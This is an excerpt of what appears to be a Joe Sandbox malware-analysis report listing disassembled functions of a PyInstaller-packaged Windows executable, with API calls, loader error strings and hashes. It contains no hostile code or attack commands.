                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF65E2864CF,?,00007FF65E28336E), ref: 00007FF65E285889
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF65E2864CF,?,00007FF65E28336E), ref: 00007FF65E28589B
                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF65E2864CF,?,00007FF65E28336E), ref: 00007FF65E2858B4
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF65E2864CF,?,00007FF65E28336E), ref: 00007FF65E2858C6
                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF65E2864CF,?,00007FF65E28336E), ref: 00007FF65E2858DF
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF65E2864CF,?,00007FF65E28336E), ref: 00007FF65E2858F1
                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF65E2864CF,?,00007FF65E28336E), ref: 00007FF65E28590D
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF65E2864CF,?,00007FF65E28336E), ref: 00007FF65E28591F
                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF65E2864CF,?,00007FF65E28336E), ref: 00007FF65E28593B
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF65E2864CF,?,00007FF65E28336E), ref: 00007FF65E28594D
                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF65E2864CF,?,00007FF65E28336E), ref: 00007FF65E285969
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF65E2864CF,?,00007FF65E28336E), ref: 00007FF65E28597B
                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF65E2864CF,?,00007FF65E28336E), ref: 00007FF65E285997
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF65E2864CF,?,00007FF65E28336E), ref: 00007FF65E2859A9
                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF65E2864CF,?,00007FF65E28336E), ref: 00007FF65E2859C5
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF65E2864CF,?,00007FF65E28336E), ref: 00007FF65E2859D7
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                                        • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                                                        • API String ID: 199729137-653951865
                                                                                                                                                                                                                                                        • Opcode ID: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                                                                                                                                                                                        • Instruction ID: 00ce6a9086011b12359e8dce0fb61d1f409d8feccf078adfd4ecd605851f8420
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A522B564A8DB0B91FE259B65AB2557433A2BF34745F4C103AF45EE226CFFBCA548C240
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                                        • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                                                        • API String ID: 199729137-3427451314
                                                                                                                                                                                                                                                        • Opcode ID: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                                                                                                                                                                                                                        • Instruction ID: ba150b72f5c499c2833d4555e45f944e75e40d3bfbc549e1d1c03aff15cd7162
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6902C765A8DB0791FE249B65AB145B533A2AF38749F4C1035F42EF226CEFBCB549C200
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF65E289390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF65E2845F4,00000000,00007FF65E281985), ref: 00007FF65E2893C9
                                                                                                                                                                                                                                                        • ExpandEnvironmentStringsW.KERNEL32(?,00007FF65E2886B7,?,?,00000000,00007FF65E283CBB), ref: 00007FF65E28822C
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF65E282810: MessageBoxW.USER32 ref: 00007FF65E2828EA
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                                                        • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                                                                        • API String ID: 1662231829-930877121
                                                                                                                                                                                                                                                        • Opcode ID: 34679b23be2e6a85bad270fe565fa16c5e09c528fb77942a9d4832d630ea4d55
                                                                                                                                                                                                                                                        • Instruction ID: ab943f22be1ebe06e4c07dfbd0f076644ee23d79b523da63ba1409ef2b65f5ff
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 34679b23be2e6a85bad270fe565fa16c5e09c528fb77942a9d4832d630ea4d55
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 20519711A2C78281FF549B25EB516B97391AFB4784F8C5432FA0EE2ADDEE7CE5058700
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                                                        • String ID: P%
                                                                                                                                                                                                                                                        • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                                                        • Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                                        • Instruction ID: 930066a9d323d8e48abafec30e02c9972efd81a3cf1d0cda4af9c68bd3bb7800
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F45108266087A186DA349F36F5181BAB7A1F7A8B61F044125EFDE83698DF7CD045CB10
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: LongWindow$BlockCreateErrorLastReasonShutdown
                                                                                                                                                                                                                                                        • String ID: Needs to remove its temporary files.
                                                                                                                                                                                                                                                        • API String ID: 3975851968-2863640275
                                                                                                                                                                                                                                                        • Opcode ID: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                                                                                                                                                                        • Instruction ID: 95128e484455597ab081a9991fa3537dcad66f2ef1913802e3c28c96a3f68b16
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 61219C21B4CB8282EF558B7AAB541797251EFA8B90F9C4230EA2DD37DCDE6CD5908200
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
• Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: -$:$f$p$p
                                                                                                                                                                                                                                                        • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                                                        • Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                                        • Instruction ID: abcb7667b957d8f5dbd0e8adad4feb9a5406bc79a4c0f8f9e0a23a0e5bdf5d00
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 56127E61E0824386FF245A14D3542B976E2FB60B50F8CA135F68AE6ACCDF3CE5C49B05
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: f$f$p$p$f
                                                                                                                                                                                                                                                        • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                                                        • Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                                        • Instruction ID: c92431c3f2b19ad514a78245bf6684d9d29dc8cb35ffddbace7df5535a84bb15
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 37125F61E0C34386FF245A17A3442B976A1FB60790F9E6035F69AD6AC8DF7CE5C08B14
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                                        • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                                        • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                                        • Opcode ID: 85c2c2a02d59a3f01d6fca0121019b429f379df926c48f268a81054661b59493
                                                                                                                                                                                                                                                        • Instruction ID: 0ea52cefb6d6ca7259a5c6bf1b5efbc983756a13d7a7122bb8d57dd8fbef602c
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 85c2c2a02d59a3f01d6fca0121019b429f379df926c48f268a81054661b59493
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A8413522A0C75286EE10DB12AB406BA7391BF64B84F9C4432FD4CE77DADE3CE9458740
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                                        • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                                        • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                                        • Opcode ID: 73de28b9ba9fe8a8e367a1b61ff615074c78b555d98f5270f885359bfc6ce07d
                                                                                                                                                                                                                                                        • Instruction ID: 6ba09c0d8d2edfa4c93e677ee70fcea47ebae8575d2bbd90d0fdeff36de69caf
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 73de28b9ba9fe8a8e367a1b61ff615074c78b555d98f5270f885359bfc6ce07d
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6B416722A0C74286EE10DB22A7405B97391BF64794F884932FD4DE7A9DDE7CE546CB04
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                        • String ID: csm$csm$csm
                                                                                                                                                                                                                                                        • API String ID: 849930591-393685449
                                                                                                                                                                                                                                                        • Opcode ID: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                                                                                                                                                                                        • Instruction ID: aa4659e3f42c6b7a15304c7e68fe7735d7625bd46b8b15cebfe575c27e0770f4
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D5D17D72A0C74186EF209B259A413AD37A4FB65798F181235FE4DA7B9ACF38E494C700
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF65E283706,?,00007FF65E283804), ref: 00007FF65E282C9E
                                                                                                                                                                                                                                                        • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF65E283706,?,00007FF65E283804), ref: 00007FF65E282D63
                                                                                                                                                                                                                                                        • MessageBoxW.USER32 ref: 00007FF65E282D99
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
• Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Message$CurrentFormatProcess
                                                                                                                                                                                                                                                        • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                                                                                                                                                                                                                        • API String ID: 3940978338-251083826
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(?,?,?,00007FF65E28DF7A,?,?,?,00007FF65E28DC6C,?,?,?,00007FF65E28D869), ref: 00007FF65E28DD4D
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF65E28DF7A,?,?,?,00007FF65E28DC6C,?,?,?,00007FF65E28D869), ref: 00007FF65E28DD5B
                                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(?,?,?,00007FF65E28DF7A,?,?,?,00007FF65E28DC6C,?,?,?,00007FF65E28D869), ref: 00007FF65E28DD85
                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,?,?,00007FF65E28DF7A,?,?,?,00007FF65E28DC6C,?,?,?,00007FF65E28D869), ref: 00007FF65E28DDF3
                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,?,?,00007FF65E28DF7A,?,?,?,00007FF65E28DC6C,?,?,?,00007FF65E28D869), ref: 00007FF65E28DDFF
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                                        • String ID: api-ms-
                                                                                                                                                                                                                                                        • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                                        • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                                                                        • API String ID: 2050909247-2434346643
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF65E28351A,?,00000000,00007FF65E283F23), ref: 00007FF65E282AA0
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                                        • String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                                        • API String ID: 2050909247-2900015858
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2506987500-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
• Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                                        • String ID: CONOUT$
                                                                                                                                                                                                                                                        • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(?,FFFFFFFF,00000000,00007FF65E283FB1), ref: 00007FF65E288EFD
                                                                                                                                                                                                                                                        • K32EnumProcessModules.KERNEL32(?,FFFFFFFF,00000000,00007FF65E283FB1), ref: 00007FF65E288F5A
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF65E289390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF65E2845F4,00000000,00007FF65E281985), ref: 00007FF65E2893C9
                                                                                                                                                                                                                                                        • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF65E283FB1), ref: 00007FF65E288FE5
                                                                                                                                                                                                                                                        • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF65E283FB1), ref: 00007FF65E289044
                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF65E283FB1), ref: 00007FF65E289055
                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF65E283FB1), ref: 00007FF65E28906A
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3462794448-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF65E294F11,?,?,?,?,00007FF65E29A48A,?,?,?,?,00007FF65E29718F), ref: 00007FF65E29B2D7
                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF65E294F11,?,?,?,?,00007FF65E29A48A,?,?,?,?,00007FF65E29718F), ref: 00007FF65E29B30D
                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF65E294F11,?,?,?,?,00007FF65E29A48A,?,?,?,?,00007FF65E29718F), ref: 00007FF65E29B33A
                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF65E294F11,?,?,?,?,00007FF65E29A48A,?,?,?,?,00007FF65E29718F), ref: 00007FF65E29B34B
                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF65E294F11,?,?,?,?,00007FF65E29A48A,?,?,?,?,00007FF65E29718F), ref: 00007FF65E29B35C
                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(?,?,?,00007FF65E294F11,?,?,?,?,00007FF65E29A48A,?,?,?,?,00007FF65E29718F), ref: 00007FF65E29B377
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2506987500-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF65E281B6A), ref: 00007FF65E28295E
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Similarity
